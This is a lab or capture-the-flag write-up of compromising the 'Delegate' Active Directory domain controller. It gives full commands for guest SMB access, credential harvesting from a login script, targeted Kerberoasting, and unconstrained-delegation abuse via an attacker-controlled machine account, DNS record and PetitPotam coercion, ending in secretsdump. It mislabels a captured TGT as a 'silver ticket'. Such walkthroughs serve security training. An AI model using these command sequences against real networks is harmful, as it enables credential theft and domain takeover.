VL-Delegate

Initial Enumeration

Not shown: 65510 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server 
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory 
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory 
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-04-01T16:43:27+00:00; -1h59m53s from scanner time.
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
49664/tcp open  unknown       syn-ack ttl 127
49665/tcp open  unknown       syn-ack ttl 127
49667/tcp open  unknown       syn-ack ttl 127
49669/tcp open  unknown       syn-ack ttl 127
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49672/tcp open  unknown       syn-ack ttl 127
49683/tcp open  unknown       syn-ack ttl 127
49685/tcp open  unknown       syn-ack ttl 127
64567/tcp open  unknown       syn-ack ttl 127
64591/tcp open  unknown       syn-ack ttl 127

SMB Enumeration

We can get access to the SMB server via a null session:

netexec smb 10.10.64.93 -u 'guest' -p '' --shares

After gaining access to the NETLOGON share, we find a users.bat file:

smbclient //10.10.64.93/NETLOGON

get users.bat

Opening that file reveals credentials for what appears to be an Administrator account, as the command will run when the username is A.Briggs:

strings users.bat

The password didn’t work for Administrator but worked for A.Briggs. This gave us access to LDAP, so the next step was running BloodHound:

netexec ldap delegate.vl -u 'A.Briggs' -p ''

netexec smb delegate.vl -u 'A.Briggs' -p '' --shares

BloodHound Analysis

After analyzing the domain structure, we discovered that we have GenericWrite permissions over N.Thompson, who also has PSRemote access to the Domain Controller - a promising attack path:

netexec ldap 10.10.64.93 -u 'A.Briggs' -p '' --bloodhound --dns-server 10.10.64.93 -c All --dns-tcp

Exploiting GenericWrite

We abused the GenericWrite permissions using targeted Kerberoasting to obtain N.Thompson’s hash and crack the password:

python3 targetedKerberoast.py -v -d 'delegate.vl' -u 'a.briggs' -p ''

hashcat hash9090.txt /usr/share/wordlists/rockyou.txt

Now we could connect to the machine using WinRM and retrieve the user flag:

evil-winrm -i 10.10.64.93 -u N.Thompson -p KALEB_2341

Unconstrained Delegation Exploitation

whoami /all

According to HarmJ0y’s blog, this GPO is located at \DOMAIN\sysvol\testlab.local\Policies{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf. By adding any user SID or username to the SeEnableDelegationPrivilege line of the [Privilege Rights] section, the setting will take hold whenever the user/machine’s current DC reboots or refreshes its group policy.

This means we can abuse unconstrained delegation by creating a machine account and appending a Service Principal Name (SPN) to it. First, we need to check if the machine quota isn’t set to 0:

nxc ldap delegate.vl -u N.Thompson -p  -M maq

impacket-addcomputer -dc-ip 10.10.64.93 -computer-pass HelloWorld123 -computer-name Evil delegate.vl/N.Thompson:''

Next, we add a DNS record for the machine account we created using krbrelayx:

python3 dnstool.py -u 'delegate.vl\Evil$' -p HelloWorld123 -r Evil.delegate.vl -d 10.8.5.195 --action add DC1.delegate.vl -dns-ip 10.10.64.93

To abuse unconstrained delegation, the machine account needs to have an SPN and TRUSTED_FOR_DELEGATION UAC. We can add the UAC using bloodyAD:

bloodyAD --host DC1.delegate.vl -u 'N.Thompson' -p '' -d 'delegate.vl' add uac 'Evil$' -f TRUSTED_FOR_DELEGATION

Now we append an SPN with addspn via msDS-AdditionalDnsHostName:

python3 addspn.py -u delegate\\N.Thompson -p 'KALEB_2341' -s CIFS/Evil.delegate.vl -q dc1.delegate.vl -t 'Evil$' -dc-ip 10.10.64.93
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=Evil,CN=Computers,DC=delegate,DC=vl - STATUS: Read - READ TIME: 2025-04-01T20:40:40.003792
    msDS-AdditionalDnsHostName: Evil.delegate.vl
    sAMAccountName: Evil$
    servicePrincipalName: cifs/Evil.delegate.vl

Additionally, we’ll add a HOST SPN on the machine we’ve created:

python3 addspn.py -u delegate\\N.Thompson -p 'KALEB_2341' -s HOST/Evil.delegate.vl -q dc1.delegate.vl -t 'Evil$' -dc-ip 10.10.64.93 --additional

First, we need to convert the machine account password to the correct hash format:

iconv -f ASCII -t UTF-16LE <(printf 'HelloWorld123') | openssl dgst -md4
MD4(stdin)= 97f8b5c01517c9d59e586246f7c1803c

python3 ./krbrelayx.py -hashes :97f8b5c01517c9d59e586246f7c1803c

Then we execute PetitPotam to trigger the authentication:

python3 PetitPotam.py -u 'Evil$' -p 'HelloWorld123' Evil.delegate.vl 10.10.64.93

We successfully obtained a silver ticket, which we now import:

export KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

impacket-secretsdump -k -no-pass DC1.delegate.vl

https://api.vulnlab.com/api/v1/share?id=c2872ceb-fa95-40cc-8623-396d1af89810